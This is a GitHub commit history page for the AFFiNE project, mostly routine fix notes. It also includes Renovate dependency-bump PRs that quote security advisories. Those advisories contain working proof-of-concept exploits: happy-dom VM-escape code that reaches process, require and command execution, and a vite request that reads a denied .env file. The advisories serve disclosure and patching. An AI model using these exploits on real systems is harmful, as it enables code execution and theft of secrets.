Summary by CodeRabbit * **New Features** * Paywall now initializes automatically for a smoother subscription flow. * New global API to retrieve the current user identifier from the app context. * **Improvements** * Added integration to better coordinate subscription/login state before showing paywall options. * Ensures user identity is validated prior to entitlement checks, improving accuracy. * Improved error messages and logging during purchase/login flows. * **Bug Fixes** * Fixed intermittent issues where subscription status could fail to load or appear outdated. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
renovate[bot]
|
a47042cbd5 |
chore: bump up happy-dom version to v20.0.2 [SECURITY] (#13765)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [happy-dom](https://redirect.github.com/capricorn86/happy-dom) | [`20.0.0` -> `20.0.2`](https://renovatebot.com/diffs/npm/happy-dom/20.0.0/20.0.2) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-62410](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-qpm2-6cq5-7pq5) ### Summary The mitigation proposed in GHSA-37j7-fg3j-429f for disabling eval/Function when executing untrusted code in happy-dom does not suffice, since it still allows prototype pollution payloads. ### Details The untrusted script and the rest of the application still run in the same Isolate/process, so attackers can deploy prototype pollution payloads to hijack important references like "process" in the example below, or to hijack control flow via flipping checks of undefined property. There might be other payloads that allow the manipulation of require, e.g., via (univeral) gadgets (https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf). ### PoC Attackers can pollute builtins like Object.prototype.hasOwnProperty() to obtain important references at runtime, e.g., "process". In this way, attackers might be able to execute arbitrary commands like in the example below via spawn(). ```js import { Browser } from "happy-dom"; const browser = new Browser({settings: {enableJavaScriptEvaluation: true}}); const page = browser.newPage({console: true}); page.url = 'https://example.com'; let payload = 'spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!==`buffer`)for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};' page.content = `<html> <script> function f() { let process = this; ${payload}; spawnSync("touch", ["success.flag"]); return "success";} this.constructor.constructor.__proto__.__proto__.toString = f; this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f; // Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf </script> <body>Hello world!</body></html>`; await browser.close(); console.log(`The process object is ${process}`); console.log(process.hasOwnProperty('spawn')); ``` ### Impact Arbitrary code execution via breaking out of the Node.js' vm isolation. ### Recommended Immediate Actions Users can freeze the builtins in the global scope to defend against attacks similar to the PoC above. However, the untrusted code might still be able to retrieve all kind of information available in the global scope and exfiltrate them via fetch(), even without prototype pollution capabilities. Not to mention side channels caused by the shared process/isolate. Migration to [isolated-vm](https://redirect.github.com/laverdet/isolated-vm) is suggested instead. Cris from the Endor Labs Security Research Team, who has worked extensively on JavaScript sandboxing in the past, submitted this advisory. --- ### Release Notes <details> <summary>capricorn86/happy-dom (happy-dom)</summary> ### [`v20.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.2) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.1...v20.0.2) ##### :construction\_worker\_man: Patch fixes - Adds frozen intrinsics flag to workers in `@happy-dom/server-renderer` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1934](https://redirect.github.com/capricorn86/happy-dom/issues/1934) ### [`v20.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.1) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.0...v20.0.1) ##### :construction\_worker\_man: Patch fixes - Adds warning for environment with unfrozen intrinsics (builtins) when JavaScript evaluation is enabled- By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1932](https://redirect.github.com/capricorn86/happy-dom/issues/1932) - A security advisory has been reported showing that the recommended preventive measure of running Node.js with `--disallow-code-generation-from-strings` wasn't enough to protect against attackers escaping the VM context and accessing process-level functions. Big thanks to [@​cristianstaicu](https://redirect.github.com/cristianstaicu) for reporting this! - The documentation for how to run Happy DOM with JavaScript evaluation enabled in a safer way has been updated. Read more about it in the [Wiki](https://redirect.github.com/capricorn86/happy-dom/wiki/JavaScript-Evaluation-Warning) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNDMuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE1Ni4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
renovate[bot]
|
2c44d3abc6 |
chore: bump up vite version to v7 [SECURITY] (#13786)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [vite](https://vite.dev) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite)) | [`^6.1.0` -> `^7.0.0`](https://renovatebot.com/diffs/npm/vite/6.3.6/7.1.11) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [vite](https://vite.dev) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite)) | [`^6.0.3` -> `^7.0.0`](https://renovatebot.com/diffs/npm/vite/6.3.6/7.1.11) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-62522](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-93m4-6634-74q7) ### Summary Files denied by [`server.fs.deny`](https://vitejs.dev/config/server-options.html#server-fs-deny) were sent if the URL ended with `\` when the dev server is running on Windows. ### Impact Only apps that match the following conditions are affected: - explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) - running the dev server on Windows ### Details `server.fs.deny` can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns). These patterns were able to bypass by using a back slash(`\`). The root cause is that `fs.readFile('/foo.png/')` loads `/foo.png`. ### PoC ```shell npm create vite@latest cd vite-project/ cat "secret" > .env npm install npm run dev curl --request-target /.env\ http://localhost:5173 ``` <img width="1593" height="616" alt="image" src="https://github.com/user-attachments/assets/36212f4e-1d3c-4686-b16f-16b35ca9e175" /> --- ### Release Notes <details> <summary>vitejs/vite (vite)</summary> ### [`v7.1.11`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-7111-2025-10-20-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.1.10...v7.1.11) ##### Bug Fixes - **dev:** trim trailing slash before `server.fs.deny` check ([#​20968](https://redirect.github.com/vitejs/vite/issues/20968)) ([f479cc5]( |
||
|
DarkSky
|
01c164a78a | fix(server): rcat event parse (#13781) | ||
|
L-Sun
|
5c0e3b8a7f |
fix(editor): missing signal of optional flat props (#13762)
Close https://github.com/toeverything/AFFiNE/issues/13750 #### PR Dependency Tree * **PR #13762** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Optional block properties are now supported (e.g., flat-table), with default values applied automatically when not set. * **Bug Fixes** * More reliable initialization and syncing of block properties, ensuring defaults appear consistently. * Change notifications now correctly reflect updates to optional/defaulted properties. * **Tests** * Added tests verifying optional property behavior, default application, syncing, and change events. <!-- end of auto-generated comment: release notes by coderabbit.ai --> #### PR Dependency Tree * **PR #13762** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal)v0.25.1-beta.0 v0.25.1 |
||
|
L-Sun
|
e4f9d42990 |
fix(core): can not scroll all page list in MacOS 26 (#13763)
Close https://github.com/toeverything/AFFiNE/issues/13754 #### PR Dependency Tree * **PR #13763** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Style** * Updated page layout sizing to no longer force full-height on the docs body, allowing height to adapt to content. * Improves natural scrolling and reduces layout constraints in the workspace “All” page. * Enhances responsiveness across varying screen sizes by relying on content and container sizing rules. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
L-Sun
|
59d8d0fbae |
fix(editor): text align not work (#13740)
#### PR Dependency Tree * **PR #13740** 👈 This tree was auto-generated by [Charcoal](https://github.com/danerwilliams/charcoal) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Improved reliability of updating block alignment when the current selection isn’t explicitly defined. The editor now retrieves the selection more consistently, reducing cases where alignment controls appeared unresponsive or had no effect. * Covers scenarios during initialization or edge cases where selection was previously missed, resulting in smoother editing and fewer false negatives when applying alignment. * No changes to visible UI or shortcuts; behavior is simply more consistent. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
renovate[bot]
|
50f41c2212 |
chore: bump up happy-dom version to v20 [SECURITY] (#13726)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [happy-dom](https://redirect.github.com/capricorn86/happy-dom) | [`^18.0.0` -> `^20.0.0`](https://renovatebot.com/diffs/npm/happy-dom/18.0.1/20.0.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-61927](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f) # Escape of VM Context gives access to process level functionality ## Summary Happy DOM v19 and lower contains a security vulnerability that puts the owner system at the risk of RCE (Remote Code Execution) attacks. A Node.js VM Context is not an isolated environment, and if the user runs untrusted JavaScript code within the Happy DOM VM Context, it may escape the VM and get access to process level functionality. What the attacker can get control over depends on if the process is using ESM or CommonJS. With CommonJS the attacker can get hold of the `require()` function to import modules. Happy DOM has JavaScript evaluation enabled by default. This may not be obvious to the consumer of Happy DOM and can potentially put the user at risk if untrusted code is executed within the environment. ## Reproduce ### CommonJS (Possible to get hold of require) ```javascript const { Window } = require('happy-dom'); const window = new Window({ console }); window.document.write(` <script> const process = this.constructor.constructor('return process')(); const require = process.mainModule.require; console.log('Files:', require('fs').readdirSync('.').slice(0,3)); </script> `); ``` ### ESM (Not possible to get hold of import or require) ```javascript const { Window } = require('happy-dom'); const window = new Window({ console }); window.document.write(` <script> const process = this.constructor.constructor('return process')(); console.log('PID:', process.pid); </script> `); ``` ## Potential Impact #### Server-Side Rendering (SSR) ```javascript const { Window } = require('happy-dom'); const window = new Window(); window.document.innerHTML = userControlledHTML; ``` #### Testing Frameworks Any test suite using Happy-DOM with untrusted content may be at risk. ## Attack Scenarios 1. **Data Exfiltration**: Access to environment variables, configuration files, secrets 2. **Lateral Movement**: Network access for connecting to internal systems. Happy DOM already gives access to the network by fetch, but has protections in place (such as CORS and header validation etc.). 3. **Code Execution**: Child process access for running arbitrary commands 4. **Persistence**: File system access ## Recommended Immediate Actions 1. Update Happy DOM to v20 or above - This version has JavaScript evaluation disabled by default - This version will output a warning if JavaScript is enabled in an insecure environment 2. Run Node.js with the "--disallow-code-generation-from-strings" if you need JavaScript evaluation enabled - This makes sure that evaluation can't be used at process level to escape the VM - `eval()` and `Function()` can still be used within the Happy DOM VM without any known security risk - Happy DOM v20 and above will output a warning if this flag is not in use 4. If you can't update Happy DOM right now, it's recommended to disable JavaScript evaluation, unless you completely trust the content within the environment ## Technical Root Cause All classes and functions inherit from [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function). By walking the constructor chain it's possible to get hold of [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) at process level. As [Function](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) can evaluate code from strings, it's possible to execute code at process level. Running Node with the "--disallow-code-generation-from-strings" flag protects against this. --- ### Release Notes <details> <summary>capricorn86/happy-dom (happy-dom)</summary> ### [`v20.0.0`](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.2...819d15ba289495439eda8be360d92a614ce22405) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.2...v20.0.0) ### [`v19.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.2) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.1...v19.0.2) ##### :construction\_worker\_man: Patch fixes - Fixes issue related to CSS pseudo selector `:scope` that didn't work correctly for direct descendants to root - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1620](https://redirect.github.com/capricorn86/happy-dom/issues/1620) ### [`v19.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.1) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v19.0.0...v19.0.1) ##### :construction\_worker\_man: Patch fixes - Fixes issue with sending in URLs as string in `@happy-dom/server-renderer` config using CLI - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1908](https://redirect.github.com/capricorn86/happy-dom/issues/1908) ### [`v19.0.0`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v19.0.0) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v18.0.1...v19.0.0) ##### 💣 Breaking Changes - Removes support for CommonJS - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Support for CommonJS is no longer needed as Node.js v18 is deprecated and v20 and above supports loading ES modules from CommonJS using `require()` - Updates Jest to v30 in the `@happy-dom/jest-environment` package - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Makes Jest packages peer dependencies to make it easier to align versions with the project using `@happy-dom/jest-environment` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) ##### 🎨 Features - Adds a new package called `@happy-dom/server-renderer` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - This package provides a simple way to statically render (SSG) or server-side render (SSR) your client-side application - Read more in the Wiki under [Server-Renderer](https://redirect.github.com/capricorn86/happy-dom/wiki/Server-Renderer) - Adds support for `import.meta` to the ESM compiler - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the CSS pseudo selector `:scope` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1620](https://redirect.github.com/capricorn86/happy-dom/issues/1620) - Improves support for `MediaList` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for `CSSKeywordValue`, `CSSStyleValue`, `StylePropertyMap`, `StylePropertyMap`, `StylePropertyMapReadOnly` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Improves debug information in the ESM compiler - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds validation of browser settings when creating a new `Browser` instance - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the browser setting [navigation.beforeContentCallback](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to inject event listeners or logic before content is loaded to the document when navigating a browser frame - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the browser setting [fetch.requestHeaders](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which provides with a declarative and simple way to add request headers - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for setting an object to [timer.preventTimerLoops](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to define different settings for `setTimeout()` and `requestAnimationFrame()` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the browser setting [viewport](https://redirect.github.com/capricorn86/happy-dom/wiki/IBrowserSettings) which makes it possible to define a default viewport size - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for the parameters `beforeContentCallback` and `headers` to `BrowserFrame.goto()`, `BrowserFrame.goBack()`, `BrowserFrame.goForward()`, `BrowserFrame.goSteps()` and `BrowserFrame.reload()` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for `PopStateEvent` and trigger the event when navigating the page history using `History.pushState()` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Use local file paths for virtual server files in stack traces - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds support for `ResponseCache.fileSystem.load()` and `ResponseCache.fileSystem.save()` for storing and loading cache from the file system - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) ##### :construction\_worker\_man: Patch fixes - Fixes a bug in the ESM compiler that caused it to fail to parse certain code - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Disables the same origin policy when navigating a browser frame using `BrowserFrame.goto()` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Fixes bug where CSS selectors with the pseudos "+" and ">" failed for selectors without arguments - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) - Adds try and catch to listeners for events dispatched from `XMLHttpRequest` to prevent it from being set to an invalid state if a listener throws an Error - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1730](https://redirect.github.com/capricorn86/happy-dom/issues/1730) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNDMuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE0My4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
Cats Juice
|
a35332634a |
fix(core): correct doc icon padding in editor header (#13721)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Style** * Refined vertical spacing in the document icon picker header, reducing excess top padding and setting a consistent bottom padding for a cleaner, tighter layout. * Improves visual alignment and readability without altering functionality—interactions and behavior remain unchanged. <!-- end of auto-generated comment: release notes by coderabbit.ai -->v0.25.0 |
||
|
DarkSky
|
0063f039a7 |
feat(server): allow cleanup session for deleted docs (#13720)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Resolved occasional errors when removing document links from sessions, ensuring cleanup completes reliably. * Improved reliability during maintenance actions by preventing unnecessary validation failures in system-initiated updates, while preserving existing checks for user-initiated changes. * **Chores** * Internal adjustments to the session update flow to better support maintenance operations without affecting user-facing behavior. <!-- end of auto-generated comment: release notes by coderabbit.ai -->v0.25.0-beta.5 |
||
|
Cats Juice
|
d80ca57e94 |
fix(core): change doc icon layout to avoid incorrect color caused by the transform (#13719)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Style** * Updated document title styling for improved readability (larger font, increased line height, heavier weight). * Refined spacing so titles align correctly when a document icon is present (no extra top padding). * Improved emoji rendering by using a consistent font and removing an unnecessary visual artifact. * Simplified title container behavior to ensure stable, predictable alignment without placeholder-based shifts. * **Chores** * Minor UI cleanup and consistency adjustments for the icon/title area. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
Lakr
|
c63e3e7fe6 |
fix(ios): adopt smaller font size for small device (#13715)
This pull request makes minor adjustments to the iOS frontend app, focusing on UI fine-tuning and improving type safety for concurrency. The most notable changes are a small font size adjustment in the paywall badge, marking an enum as `Sendable` for safer concurrency, and removing a StoreKit configuration reference from the Xcode scheme. UI adjustments: * Reduced the font size for the badge text in `PackageOptionView` from 12 to 10 for a more refined appearance. Concurrency and type safety: * Added the `Sendable` protocol conformance to the `SKUnitCategory` enum to ensure it can be safely used across concurrency boundaries. Project configuration: * Removed the `StoreKitConfigurationFileReference` from the `App.xcscheme`, which may help streamline scheme configuration or prevent unnecessary StoreKit file usage during app launch. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - Style - Tweaked paywall option badge text size for a cleaner, more polished look. - Refactor - Improved concurrency safety in underlying models to enhance stability. - Chores - Removed a development-only StoreKit configuration from the iOS debug launch setup. <!-- end of auto-generated comment: release notes by coderabbit.ai -->v0.25.0-beta.4 |
||
|
DarkSky
|
05d373081a |
fix(server): update email verified at oauth (#13714)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Automatic email verification when signing in or reconnecting with a linked OAuth provider: if the provider confirms the same email and your account was unverified, your email will be marked as verified automatically. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
William Guinaudie
|
26fbde6b62 |
fix(core): quick search modal on mobile device (#13694)
When searching on a mobile device, the search modal is wider than the screen, making it hard to use <img width="345" height="454" alt="Screenshot 2025-10-04 at 17 43 54" src="https://github.com/user-attachments/assets/10594459-86c5-470b-a22f-578363694383" /> Now with the fix applied, it is usable <img width="350" height="454" alt="Screenshot 2025-10-04 at 17 44 14" src="https://github.com/user-attachments/assets/eb783f5b-e3b6-4b7d-8f31-0d876911d95f" /> <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - **Style** - Improved mobile responsiveness of the Quick Search modal. On screens 520px wide or smaller, the modal content now adapts its width instead of enforcing a minimum, reducing overflow and improving readability on small devices. - No visual or behavioral changes on larger screens; existing layouts and interactions remain unchanged. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
Cats Juice
|
072b5b22df |
fix(core): display affine icon in lit correctly (#13708)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - New Features - Added an alternative icon rendering option for document icons, delivering crisper visuals and consistent emoji/icon display. - Style - Improved icon alignment and sizing within grouped icon buttons for more consistent centering and appearance. <!-- end of auto-generated comment: release notes by coderabbit.ai --> Co-authored-by: Wu Yue <akumatus@gmail.com> |